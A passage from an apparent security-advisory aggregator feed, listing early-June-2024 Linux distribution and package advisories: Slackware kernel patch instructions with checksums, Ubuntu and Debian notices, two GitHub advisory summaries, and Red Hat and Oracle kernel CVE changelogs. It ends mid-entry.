Fixed in 5.15.151: https://www.cve.org/CVERecord?id=CVE-2023-52620 https://www.cve.org/CVERecord?id=CVE-2024-0841 https://www.cve.org/CVERecord?id=CVE-2024-26622 https://www.cve.org/CVERecord?id=CVE-2024-26688 https://www.cve.org/CVERecord?id=CVE-2024-26782 https://www.cve.org/CVERecord?id=CVE-2024-26788 https://www.cve.org/CVERecord?id=CVE-2024-26790 https://www.cve.org/CVERecord?id=CVE-2024-26791 https://www.cve.org/CVERecord?id=CVE-2024-26793 https://www.cve.org/CVERecord?id=CVE-2024-26795 https://www.cve.org/CVERecord?id=CVE-2024-26798 https://www.cve.org/CVERecord?id=CVE-2024-26801 https://www.cve.org/CVERecord?id=CVE-2024-26802 https://www.cve.org/CVERecord?id=CVE-2024-26803 https://www.cve.org/CVERecord?id=CVE-2024-26804 https://www.cve.org/CVERecord?id=CVE-2024-26805 Fixed in 5.15.152: https://www.cve.org/CVERecord?id=CVE-2024-26659 https://www.cve.org/CVERecord?id=CVE-2024-26787 Fixed in 5.15.153: https://www.cve.org/CVERecord?id=CVE-2023-52447 https://www.cve.org/CVERecord?id=CVE-2023-6270 https://www.cve.org/CVERecord?id=CVE-2023-7042 https://www.cve.org/CVERecord?id=CVE-2024-22099 https://www.cve.org/CVERecord?id=CVE-2024-26651 https://www.cve.org/CVERecord?id=CVE-2024-26809 ( Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated packages for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.160/kernel-generic-5.15.160-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.160/kernel-generic-smp-5.15.160_smp-i686-1.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.160/kernel-headers-5.15.160_smp-x86-1.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.160/kernel-huge-5.15.160-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.160/kernel-huge-smp-5.15.160_smp-i686-1.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.160/kernel-modules-5.15.160-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.160/kernel-modules-smp-5.15.160_smp-i686-1.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.160/kernel-source-5.15.160_smp-noarch-1.txzUpdated packages for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.160/kernel-generic-5.15.160-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.160/kernel-headers-5.15.160-x86-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.160/kernel-huge-5.15.160-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.160/kernel-modules-5.15.160-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.160/kernel-source-5.15.160-noarch-1.txzMD5 signaturesSlackware 15.0 packages:9a5f0b30b8557ee0f995e157e668bbab kernel-generic-5.15.160-i586-1.txzdbc4ab11932f6e1b53f31bfa28bbd920 kernel-generic-smp-5.15.160_smp-i686-1.txz9d916ab958cb3efafedca2b4d63787b6 kernel-headers-5.15.160_smp-x86-1.txz9f15be076ef0edce60ce9c0024b1f2ce kernel-huge-5.15.160-i586-1.txzcb88980a1a24894d809904add3571c90 kernel-huge-smp-5.15.160_smp-i686-1.txz2d971a34e5f0ca005e45ca9028de4085 kernel-modules-5.15.160-i586-1.txz1f5ae65fd73694a902c6210b21132c7f kernel-modules-smp-5.15.160_smp-i686-1.txz02decce15d2cecaa97c63b2c44c57ecb kernel-source-5.15.160_smp-noarch-1.txzSlackware x86_64 15.0 packages:a08d3e9b7cd8acb1f3541423af4f5033 kernel-generic-5.15.160-x86_64-1.txz3c4c4d0cf660b807f16d7a3d02a2bc98 kernel-headers-5.15.160-x86-1.txz6459e19c0b7697bbfc8a37897f7f72d0 kernel-huge-5.15.160-x86_64-1.txzd993f853995368eef81caacc7b2fc454 kernel-modules-5.15.160-x86_64-1.txzd973ec20bc738201d4e6a3de344b7257 kernel-source-5.15.160-noarch-1.txzInstallation instructionsUpgrade the packages as root:`# upgradepkg kernel-.txz`If you are using an initrd, you'll need to rebuild it.For a 32-bit SMP machine, use this command (substitute the appropriatekernel version if you are not running Slackware 15.0):`# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 5.15.160-smp \| bash`For a 64-bit machine, or a 32-bit uniprocessor machine, use this command(substitute the appropriate kernel version if you are not runningSlackware 15.0):`# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 5.15.160 \| bash`Please note that "uniprocessor" has to do with the kernel you are running,not with the CPU. Most systems should run the SMP kernel (if they can)regardless of the number of cores the CPU has. If you aren't sure whichkernel you are running, run "uname -a". If you see SMP there, you arerunning the SMP kernel and should use the 5.15.160-smp version when runningmkinitrd_command_generator. Note that this is only for 32-bit -- 64-bitsystems should always use 5.15.160 as the version.If you are using lilo or elilo to boot the machine, you'll need to ensurethat the machine is properly prepared before rebooting.If using LILO:By default, lilo.conf contains an image= line that references a symlinkthat always points to the correct kernel. No editing should be requiredunless your machine uses a custom lilo.conf. If that is the case, be surethat the image= line references the correct kernel file. Either way,you'll need to run "lilo" as root to reinstall the boot loader.If using elilo:Ensure that the /boot/vmlinuz symlink is pointing to the kernel you wishto use, and then run eliloconfig to update the EFI System Partition.	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-157-01
05.06.2024 20:19:09	ubuntu	[USN-6807-1] FRR vulnerabilities	FRR could be made to crash or run programs if it receivedspecially crafted network traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6807-1
05.06.2024 19:53:49	maven	[MAVEN:GHSA-G762-H86W-8749] BoringSSLAEADContext in Netty Repeats Nonces (moderate)	### SummaryBoringSSLAEADContext keeps track of how many OHTTP responses have been sent and uses this sequence number to calculate the appropriate nonce to use with the encryption algorithm. Unfortunately, two separate errors combine which would allow an attacker to cause the sequence number to overflow and thus the nonce to repeat.### Details1. There is no overflow detection or enforcement of the maximum sequence value. (This is a missed requirement from the draft Chunked Oblivious OHTTP RFC and so should be inherited from the HPKE RFC 9180, Section 5.2).2. The sequence number (seq) is stored as 32-bit int which is relatively easy to overflow.https://github.com/netty/netty-incubator-codec-ohttp/blob/1ddadb6473cd3be5491d114431ed4c1a9f316001/codec-ohttp-hpke-classes-boringssl/src/main/java/io/netty/incubator/codec/hpke/boringssl/BoringSSLAEADContext.java#L112-L114### ImpactIf the BoringSSLAEADContext is used to encrypt more than 2^32 messages then the AES-GCM nonce will repeat.Repeating a nonce with AES-GCM results in both confidentiality and integrity compromise of data encrypted with the associated key.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-G762-H86W-8749
05.06.2024 16:41:43	ubuntu	[USN-6806-1] GDK-PixBuf vulnerability	GDK-PixBuf could be made to crash or run programs asyour login if it opened a specially crafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6806-1
05.06.2024 16:29:12	npm	[NPM:GHSA-665W-MWRR-77Q3] Arbitrary file read via Playwright's screenshot feature exploiting file wrapper (moderate)	### ImpactAll users of url-to-png. Please see https://github.com/jasonraimondi/url-to-png/issues/47### Patches[v2.0.3](https://github.com/jasonraimondi/url-to-png/releases/tag/v2.0.3) requires input url to be of protocol `http` or `https` ### WorkaroundsRequires upgrade.### References- https://github.com/jasonraimondi/url-to-png/issues/47- https://github.com/user-attachments/files/15536336/Arbitrary.File.Read.via.Playwright.s.Screenshot.Feature.Exploiting.File.Wrapper.pdf	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-665W-MWRR-77Q3
05.06.2024 16:17:14	ubuntu	[USN-6715-2] unixODBC vulnerability	unixODBC could be made to crash or execute arbitrary code.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6715-2
05.06.2024 21:34:23	almalinux	[ALSA-2024:3626] libxml2 security update (moderate)	libxml2 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3626
05.06.2024 20:12:39	almalinux	[ALSA-2024:3618] kernel update (moderate)	kernel update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3618
05.06.2024 03:00:00	debian	[DSA-5704-1] pillow	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5704-1
05.06.2024 03:00:00	debian	[DSA-5705-1] tinyproxy	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5705-1
05.06.2024 03:00:00	debian	[DSA-5706-1] libarchive	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5706-1
05.06.2024 03:00:00	oraclelinux	[ELSA-2024-3588] glibc security update (important)	[2.17-326.3]- Forward-port Oracle patches to 2.17-326.3 Reviewed-by: Jose E. Marchesi[2.17-326.3]- nscd: Fix timeout type in netgroup cache (RHEL-34263)[2.17-326.2]- nscd: Do not use sendfile for the netgroup cache- nscd: Use-after-free in netgroup cache- CVE-2021-27645: nscd: double-free in netgroup cache- CVE-2024-33599: nscd: buffer overflow in netgroup cache (RHEL-34263)- CVE-2024-33600: nscd: null pointer dereferences in netgroup cache- CVE-2024-33601: nscd: crash on out-of-memory condition- CVE-2024-33602: nscd: memory corruption with NSS netgroup modules[2.17-326.1]- CVE-2024-2961: Out of bounds write in iconv conversion to ISO-2022-CN-EXT (RHEL-31803)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3588
05.06.2024 03:00:00	oraclelinux	[ELSA-2024-3626] libxml2 security update (moderate)	[2.9.7-18.1]- Fix CVE-2024-25062 (RHEL-31056)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3626
05.06.2024 03:00:00	redhat	[RHSA-2024:3626] libxml2 security update (moderate)	The libxml2 library is a development toolbox providing the implementation ofvarious XML standards.Security Fix(es):* libxml2: use-after-free in XMLReader (CVE-2024-25062)For more details about the security issue(s), including the impact,a CVSS score, acknowledgments, and other related information, referto the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3626
05.06.2024 03:00:00	redhat	[RHSA-2024:3618] kernel update (moderate)	The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):* kernel: Marvin vulnerability side-channel leakage in the RSA decryptionoperation (CVE-2023-6240)* kernel: Information disclosure in vhost/vhost.c:vhost_new_msg()(CVE-2024-0340)* kernel: untrusted VMM can trigger int80 syscall handling (CVE-2024-25744)* kernel: i2c: i801: Fix block process call transactions (CVE-2024-26593)* kernel: pvrusb2: fix use after free on context disconnection (CVE-2023-52445)* kernel: x86/fpu: Stop relying on userspace for info to fault in xsave bufferthat cause loop forever (CVE-2024-26603)* kernel: use after free in i2c (CVE-2019-25162)* kernel: i2c: validate user data in compat ioctl (CVE-2021-46934)* kernel: media: dvbdev: Fix memory leak in dvb_media_device_free()(CVE-2020-36777)* kernel: usb: hub: Guard against accesses to uninitialized BOS descriptors(CVE-2023-52477)* kernel: mtd: require write permissions for locking and badblock ioctls(CVE-2021-47055)* kernel: net/smc: fix illegal rmb_desc access in SMC-D connection dump(CVE-2024-26615)* kernel: vt: fix memory overlapping when deleting chars in the buffer(CVE-2022-48627)* kernel: Integer Overflow in raid5_cache_count (CVE-2024-23307)* kernel: media: uvcvideo: out-of-bounds read in uvc_query_v4l2_menu()(CVE-2023-52565)* kernel: net: bridge: data races indata-races in br_handle_frame_finish()(CVE-2023-52578)* kernel: net: usb: smsc75xx: Fix uninit-value access in __smsc75xx_read_reg(CVE-2023-52528)* kernel: platform/x86: think-lmi: Fix reference leak (CVE-2023-52520)* kernel: RDMA/siw: Fix connection failure handling (CVE-2023-52513)* kernel: pid: take a reference when initializing `cad_pid` (CVE-2021-47118)* kernel: net/sched: act_ct: fix skb leak and crash on ooo frags(CVE-2023-52610)* kernel: netfilter: nf_tables: mark set as dead when unbinding anonymous setwith timeout (CVE-2024-26643)* kernel: netfilter: nf_tables: disallow anonymous set with timeout flag(CVE-2024-26642)* kernel: i2c: i801: Don't generate an interrupt on bus reset(CVE-2021-47153)* kernel: xhci: handle isoc Babble and Buffer Overrun events properly(CVE-2024-26659)* kernel: hwmon: (coretemp) Fix out-of-bounds memory access (CVE-2024-26664)* kernel: wifi: mac80211: fix race condition on enabling fast-xmit(CVE-2024-26779)* kernel: RDMA/srpt: Support specifying the srpt_service_guid parameter(CVE-2024-26744)* kernel: RDMA/qedr: Fix qedr_create_user_qp error flow (CVE-2024-26743)* kernel: tty: tty_buffer: Fix the softlockup issue in flush_to_ldisc(CVE-2021-47185)* kernel: do_sys_name_to_handle(): use kzalloc() to fix kernel-infoleak(CVE-2024-26901)* kernel: RDMA/srpt: Do not register event handler until srpt device is fullysetup (CVE-2024-26872)* kernel: usb: ulpi: Fix debugfs directory leak (CVE-2024-26919)* kernel: usb: xhci: Add error handling in xhci_map_urb_for_dma (CVE-2024-26964)* kernel: USB: core: Fix deadlock in usb_deauthorize_interface()(CVE-2024-26934)* kernel: USB: core: Fix deadlock in port "disable" sysfs attribute(CVE-2024-26933)* kernel: fs: sysfs: Fix reference leak in sysfs_break_active_protection()(CVE-2024-26993)* kernel: fat: fix uninitialized field in nostale filehandles (CVE-2024-26973)* kernel: USB: usb-storage: Prevent divide-by-0 error in isd200_ata_command(CVE-2024-27059)* kernel: net:emac/emac-mac: Fix a use after free in emac_mac_tx_buf_send (CVE-2021-47013)* kernel: net: usb: fix memory leak in smsc75xx_bind (CVE-2021-47171)* kernel: powerpc/pseries: Fix potential memleak in papr_get_attr() (CVE-2022-48669)* kernel: uio: Fix use-after-free in uio_open (CVE-2023-52439)* kernel: wifi: ath9k: Fix potential array-index-out-of-bounds read in ath9k_htc_txstatus() (CVE-2023-52594)* kernel: wifi: rt2x00: restart beacon queue when hardware reset (CVE-2023-52595)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3618
05.06.2024 03:00:00	redhat	[RHSA-2024:3627] kernel-rt security and bug fix update (moderate)	The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.Security Fix(es):* kernel: Marvin vulnerability side-channel leakage in the RSA decryption operation (CVE-2023-6240)* kernel: Information disclosure in vhost/vhost.c:vhost_new_msg() (CVE-2024-0340)* kernel: untrusted VMM can trigger int80 syscall handling (CVE-2024-25744)* kernel: i2c: i801: Fix block process call transactions (CVE-2024-26593)* kernel: pvrusb2: fix use after free on context disconnection (CVE-2023-52445)* kernel: x86/fpu: Stop relying on userspace for info to fault in xsave buffer that cause loop forever (CVE-2024-26603)* kernel: use after free in i2c (CVE-2019-25162)* kernel: i2c: validate user data in compat ioctl (CVE-2021-46934)* kernel: media: dvbdev: Fix memory leak in dvb_media_device_free() (CVE-2020-36777)* kernel: usb: hub: Guard against accesses to uninitialized BOS descriptors (CVE-2023-52477)* kernel: mtd: require write permissions for locking and badblock ioctls (CVE-2021-47055)* kernel: net/smc: fix illegal rmb_desc access in SMC-D connection dump (CVE-2024-26615)* kernel: vt: fix memory overlapping when deleting chars in the buffer (CVE-2022-48627)* kernel: Integer Overflow in raid5_cache_count (CVE-2024-23307)* kernel: media: uvcvideo: out-of-bounds read in uvc_query_v4l2_menu() (CVE-2023-52565)* kernel: net: bridge: data races indata-races in br_handle_frame_finish() (CVE-2023-52578)* kernel: net: usb: smsc75xx: Fix uninit-value access in __smsc75xx_read_reg (CVE-2023-52528)* kernel: platform/x86: think-lmi: Fix reference leak (CVE-2023-52520)* kernel: RDMA/siw: Fix connection failure handling (CVE-2023-52513)* kernel: pid: take a reference when initializing `cad_pid` (CVE-2021-47118)* kernel: net/sched: act_ct: fix skb leak and crash on ooo frags (CVE-2023-52610)* kernel: netfilter: nf_tables: mark set as dead when unbinding anonymous set with timeout (CVE-2024-26643)* kernel: netfilter: nf_tables: disallow anonymous set with timeout flag (CVE-2024-26642)* kernel: i2c: i801: Don't generate an interrupt on bus reset (CVE-2021-47153)* kernel: xhci: handle isoc Babble and Buffer Overrun events properly (CVE-2024-26659)* kernel: hwmon: (coretemp) Fix out-of-bounds memory access (CVE-2024-26664)* kernel: wifi: mac80211: fix race condition on enabling fast-xmit (CVE-2024-26779)* kernel: RDMA/srpt: Support specifying the srpt_service_guid parameter (CVE-2024-26744)* kernel: RDMA/qedr: Fix qedr_create_user_qp error flow (CVE-2024-26743)* kernel: tty: tty_buffer: Fix the softlockup issue in flush_to_ldisc (CVE-2021-47185)* kernel: do_sys_name_to_handle(): use kzalloc() to fix kernel-infoleak (CVE-2024-26901)* kernel: RDMA/srpt: Do not register event handler until srpt device is fully setup (CVE-2024-26872)* kernel: usb: ulpi: Fix debugfs directory leak (CVE-2024-26919)* kernel: usb: xhci: Add error handling in xhci_map_urb_for_dma (CVE-2024-26964)* kernel: USB: core: Fix deadlock in usb_deauthorize_interface() (CVE-2024-26934)* kernel: USB: core: Fix deadlock in port "disable" sysfs attribute (CVE-2024-26933)* kernel: fs: sysfs: Fix reference leak in sysfs_break_active_protection() (CVE-2024-26993)* kernel: fat: fix uninitialized field in nostale filehandles (CVE-2024-26973)* kernel: USB: usb-storage: Prevent divide-by-0 error in isd200_ata_command (CVE-2024-27059)Bug Fix(es):* kernel-rt: update RT source tree to the latest RHEL-8.10.z kernel (JIRA:RHEL-34640)* kernel-rt: epoll_wait not reporting catching all events to application (JIRA:RHEL-23022)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:3627
05.06.2024 03:00:00	oraclelinux	[ELSA-2024-3618] kernel update (moderate)	[4.18.0-553.5.1.el8_10.OL8]- Update Oracle Linux certificates (Kevin Lyons)- Disable signing for aarch64 (Ilya Okomin)- Oracle Linux RHCK Module Signing Key was added to the kernel trusted keys list (olkmod_signing_key.pem) [Orabug: 29539237]- Update x509.genkey [Orabug: 24817676]- Conflict with shim-ia32 and shim-x64 <= 15.3-1.0.3- Remove upstream reference during boot (Kevin Lyons) [Orabug: 34750652]- Drop not needed patch[4.18.0-553.5.1.el8_10]- tools/power/turbostat: Fix uncore frequency file string (David Arcari) [RHEL-29238]- tools/power turbostat: Expand probe_intel_uncore_frequency() (David Arcari) [RHEL-29238]- uio: Fix use-after-free in uio_open (Ricardo Robaina) [RHEL-26232] {CVE-2023-52439}- net:emac/emac-mac: Fix a use after free in emac_mac_tx_buf_send (Ken Cox) [RHEL-27316] {CVE-2021-47013}- keys: Fix linking a duplicate key to a keyring's assoc_array (David Howells) [RHEL-30772]- keys: Hoist locking out of __key_link_begin() (David Howells) [RHEL-30772]- keys: Break bits out of key_unlink() (David Howells) [RHEL-30772]- keys: Change keyring_serialise_link_sem to a mutex (David Howells) [RHEL-30772]- wifi: brcm80211: handle pmk_op allocation failure (Jose Ignacio Tornos Martinez) [RHEL-35150] {CVE-2024-27048}- wifi: rtl8xxxu: add cancel_work_sync() for c2hcmd_work (Jose Ignacio Tornos Martinez) [RHEL-35140] {CVE-2024-27052}- wifi: iwlwifi: mvm: ensure offloading TID queue exists (Jose Ignacio Tornos Martinez) [RHEL-35130] {CVE-2024-27056}- wifi: mt76: mt7921e: fix use-after-free in free_irq() (Jose Ignacio Tornos Martinez) [RHEL-34866] {CVE-2024-26892}- wifi: ath9k: delay all of ath9k_wmi_event_tasklet() until init is complete (Jose Ignacio Tornos Martinez) [RHEL-34189] {CVE-2024-26897}- wifi: iwlwifi: mvm: fix a crash when we run out of stations (Jose Ignacio Tornos Martinez) [RHEL-31547] {CVE-2024-26693}- wifi: iwlwifi: fix double-free bug (Jose Ignacio Tornos Martinez) [RHEL-31543] {CVE-2024-26694}- wifi: ath9k: Fix potential array-index-out-of-bounds read in ath9k_htc_txstatus() (Jose Ignacio Tornos Martinez) [RHEL-29089] {CVE-2023-52594}- wifi: rt2x00: restart beacon queue when hardware reset (Jose Ignacio Tornos Martinez) [RHEL-29093] {CVE-2023-52595}- wifi: iwlwifi: fix a memory corruption (Jose Ignacio Tornos Martinez) [RHEL-28903] {CVE-2024-26610}[4.18.0-553.4.1.el8_10]- cpuhotplug: Fix kABI breakage caused by CPUHP_AP_HYPERV_ONLINE (Vitaly Kuznetsov) [RHEL-36117]- net/mlx5e: Prevent deadlock while disabling aRFS (Kamal Heib) [RHEL-35041] {CVE-2024-27014}- x86/tsc: Defer marking TSC unstable to a worker (Wander Lairson Costa) [RHEL-32676]- x86/smpboot: Make TSC synchronization function call based (Wander Lairson Costa) [RHEL-32676]- net: usb: fix possible use-after-free in smsc75xx_bind (Jose Ignacio Tornos Martinez) [RHEL-30311] {CVE-2021-47171}- net: usb: fix memory leak in smsc75xx_bind (Jose Ignacio Tornos Martinez) [RHEL-30311] {CVE-2021-47171}[4.18.0-552.3.1.el8_10]- netfilter: nf_tables: mark set as dead when unbinding anonymous set with timeout (Phil Sutter) [RHEL-30076] {CVE-2024-26643}- netfilter: nf_tables: disallow anonymous set with timeout flag (Phil Sutter) [RHEL-30080] {CVE-2024-26642}- selftests/bpf: Fix pyperf180 compilation failure with clang18 (Artem Savkov) [RHEL-35576]- md/raid5: fix atomicity violation in raid5_cache_count (Nigel Croxon) [RHEL-27930] {CVE-2024-23307}- usb: ulpi: Fix debugfs directory leak (Desnes Nunes) [RHEL-33287] {CVE-2024-26919}- powerpc/pseries: Fix potential memleak in papr_get_attr() (Mamatha Inamdar) [RHEL-35213] {CVE-2022-48669}- USB: usb-storage: Prevent divide-by-0 error in isd200_ata_command (Desnes Nunes) [RHEL-35122] {CVE-2024-27059}- NFSv4: fairly test all delegations on a SEQ4_ revocation (Benjamin Coddington) [RHEL-34912]- USB: core: Fix deadlock in usb_deauthorize_interface() (Desnes Nunes) [RHEL-35002] {CVE-2024-26934}- usb: xhci: Add error handling in xhci_map_urb_for_dma (Desnes Nunes) [RHEL-34958] {CVE-2024-26964}- fs: sysfs: Fix reference leak in sysfs_break_active_protection() (Ewan D. Milne) [RHEL-35076] {CVE-2024-26993}- xhci: handle isoc Babble and Buffer Overrun events properly (Desnes Nunes) [RHEL-31297] {CVE-2024-26659}- xhci: process isoc TD properly when there was a transaction error mid TD. (Desnes Nunes) [RHEL-31297] {CVE-2024-26659}- USB: core: Fix deadlock in port "disable" sysfs attribute (Desnes Nunes) [RHEL-35006] {CVE-2024-26933}- USB: core: Add hub_get() and hub_put() routines (Desnes Nunes) [RHEL-35006] {CVE-2024-26933}- netfilter: ipset: Missing gc cancellations fixed (Phil Sutter) [RHEL-30521]- netfilter: ipset: fix performance regression in swap operation (Phil Sutter) [RHEL-30521]- netfilter: ipset: Fix "INFO: rcu detected stall in hash_xxx" reports (Phil Sutter) [RHEL-30521]- netfilter: ipset: fix race condition between swap/destroy and kernel side add/del/test (Phil Sutter) [RHEL-30521]- x86/apic/x2apic: Fix a NULL pointer deref when handling a dying cpu (David Arcari) [RHEL-32516]- x86/coco: Disable 32-bit emulation by default on TDX and SEV (Vitaly Kuznetsov) [RHEL-25087] {CVE-2024-25744}- x86: Make IA32_EMULATION boot time configurable (Vitaly Kuznetsov) [RHEL-25087] {CVE-2024-25744}- x86/entry: Make IA32 syscalls' availability depend on ia32_enabled() (Vitaly Kuznetsov) [RHEL-25087] {CVE-2024-25744}- x86/elf: Make loading of 32bit processes depend on ia32_enabled() (Vitaly Kuznetsov) [RHEL-25087] {CVE-2024-25744}- x86/entry: Rename ignore_sysret() (Vitaly Kuznetsov) [RHEL-25087] {CVE-2024-25744}- x86/cpu: Don't write CSTAR MSR on Intel CPUs (Vitaly Kuznetsov) [RHEL-25087] {CVE-2024-25744}- x86: Introduce ia32_enabled() (Vitaly Kuznetsov) [RHEL-25087] {CVE-2024-25744}[4.18.0-552.2.1.el8_10]- s390/ptrace: handle setting of fpc register correctly (Tobias Huschle) [RHEL-29106] {CVE-2023-52598}- net/smc: fix illegal rmb_desc access in SMC-D connection dump (Tobias Huschle) [RHEL-27746] {CVE-2024-26615}- wifi: mac80211: fix race condition on enabling fast-xmit (Jose Ignacio Tornos Martinez) [RHEL-31664] {CVE-2024-26779}- powerpc/fadump: make is_kdump_kernel() return false when fadump is active (Mamatha Inamdar) [RHEL-24401]- vmcore: remove dependency with is_kdump_kernel() for exporting vmcore (Mamatha Inamdar) [RHEL-24401]- mtd: require write permissions for locking and badblock ioctls (Prarit Bhargava) [RHEL-27585] {CVE-2021-47055}- mtd: properly check all write ioctls for permissions (Prarit Bhargava) [RHEL-27585] {CVE-2021-47055}- pid: take a reference when initializing (Waiman Long) [RHEL-29420] {CVE-2021-47118}- i2c: i801: Don't generate an interrupt on bus reset (Prarit Bhargava) [RHEL-30325] {CVE-2021-47153}- RDMA/srpt: Do not register event handler until srpt device is fully setup (Kamal Heib) [RHEL-33224] {CVE-2024-26872}- ceph: switch to corrected encoding of max_xattr_size in mdsmap (Xiubo Li) [RHEL-26723]- ceph: switch to use cap_delay_lock for the unlink delay list (Xiubo Li) [RHEL-32870]- ceph: pass ino# instead of old_dentry if it's disconnected (Xiubo Li) [RHEL-32870]- fat: fix uninitialized field in nostale filehandles (Andrey Albershteyn) [RHEL-33186 RHEL-35108] {CVE-2024-26973}- do_sys_name_to_handle(): use kzalloc() to fix kernel-infoleak (Andrey Albershteyn) [RHEL-33186] {CVE-2024-26901}- idpf: limit the support to GCP only (Michal Schmidt) [RHEL-15652]- redhat/configs: enable CONFIG_IDPF (Michal Schmidt) [RHEL-15652]- idpf: remove the use of ETHTOOL_RING_USE_TCP_DATA_SPLIT (Michal Schmidt) [RHEL-15652]- idpf: workaround for unavailable skb page recycling (Michal Schmidt) [RHEL-15652]- idpf: always allocate a full page (Michal Schmidt) [RHEL-15652]- idpf: remove page pool stats code (Michal Schmidt) [RHEL-15652]- idpf: add minimal macros for __free(kfree) to work (Michal Schmidt) [RHEL-15652]- idpf: fixup include paths for RHEL 8 (Michal Schmidt) [RHEL-15652]- idpf: fix kernel panic on unknown packet types (Michal Schmidt) [RHEL-15652]- idpf: disable local BH when scheduling napi for marker packets (Michal Schmidt) [RHEL-15652]- idpf: remove dealloc vector msg err in idpf_intr_rel (Michal Schmidt) [RHEL-15652]- idpf: fix minor controlq issues (Michal Schmidt) [RHEL-15652]- idpf: prevent deinit uninitialized virtchnl core (Michal Schmidt) [RHEL-15652]- idpf: cleanup virtchnl cruft (Michal Schmidt) [RHEL-15652]- idpf: refactor idpf_recv_mb_msg (Michal Schmidt) [RHEL-15652]- idpf: add async_handler for MAC filter messages (Michal Schmidt) [RHEL-15652]- idpf: refactor remaining virtchnl messages (Michal Schmidt) [RHEL-15652]- idpf: refactor queue related virtchnl messages (Michal Schmidt) [RHEL-15652]- idpf: refactor vport virtchnl messages (Michal Schmidt) [RHEL-15652]- idpf: implement virtchnl transaction manager (Michal Schmidt) [RHEL-15652]- idpf: add idpf_virtchnl.h (Michal Schmidt) [RHEL-15652]- idpf: avoid compiler padding in virtchnl2_ptype struct (Michal Schmidt) [RHEL-15652]- idpf: distinguish vports by the dev_port attribute (Michal Schmidt) [RHEL-15652]- idpf: avoid compiler introduced padding in virtchnl2_rss_key struct (Michal Schmidt) [RHEL-15652]- idpf: fix corrupted frames and skb leaks in singleq mode (Michal Schmidt) [RHEL-15652]- idpf: refactor some missing field get/prep conversions (Michal Schmidt) [RHEL-15652]- idpf: add get/set for Ethtool's header split ringparam (Michal Schmidt) [RHEL-15652]- idpf: fix potential use-after-free in idpf_tso() (Michal Schmidt) [RHEL-15652]- idpf: cancel mailbox work in error path (Michal Schmidt) [RHEL-15652]- idpf: set scheduling mode for completion queue (Michal Schmidt) [RHEL-15652]- idpf: add SRIOV support and other ndo_ops (Michal Schmidt) [RHEL-15652]- idpf: add ethtool callbacks (Michal Schmidt) [RHEL-15652]- idpf: add singleq start_xmit and napi poll (Michal Schmidt) [RHEL-15652]- idpf: add RX splitq napi poll support (Michal Schmidt) [RHEL-15652]- idpf: add TX splitq napi poll support (Michal Schmidt) [RHEL-15652]- idpf: add splitq start_xmit (Michal Schmidt) [RHEL-15652]- idpf: initialize interrupts and enable vport (Michal Schmidt) [RHEL-15652]- idpf: configure resources for RX queues (Michal Schmidt) [RHEL-15652]- idpf: configure resources for TX queues (Michal Schmidt) [RHEL-15652]- idpf: add ptypes and MAC filter support (Michal Schmidt) [RHEL-15652]- idpf: add create vport and netdev configuration (Michal Schmidt) [RHEL-15652]- idpf: add core init and interrupt request (Michal Schmidt) [RHEL-15652]- idpf: add controlq init and reset checks (Michal Schmidt) [RHEL-15652]- idpf: add module register and probe functionality (Michal Schmidt) [RHEL-15652]- virtchnl: add virtchnl version 2 ops (Michal Schmidt) [RHEL-15652]- net: netdev_queue: netdev_txq_completed_mb(): fix wake condition (Michal Schmidt) [RHEL-15652]- net: piggy back on the memory barrier in bql when waking queues (Michal Schmidt) [RHEL-15652]- net: provide macros for commonly copied lockless queue stop/wake code (Michal Schmidt) [RHEL-15652][4.18.0-552.1.1.el8_10]- redhat: set DIST to el8_10 and ZSTREAM to yes for 8.10 (Denys Vlasenko)- tty: tty_buffer: Fix the softlockup issue in flush_to_ldisc (Prarit Bhargava) [RHEL-32590] {CVE-2021-47185}- net: mana: Fix Rx DMA datasize and skb_over_panic (Cathy Avery) [RHEL-32579]- RDMA/srpt: Support specifying the srpt_service_guid parameter (Kamal Heib) [RHEL-31710] {CVE-2024-26744}- RDMA/qedr: Fix qedr_create_user_qp error flow (Kamal Heib) [RHEL-31714] {CVE-2024-26743}- hwmon: (coretemp) 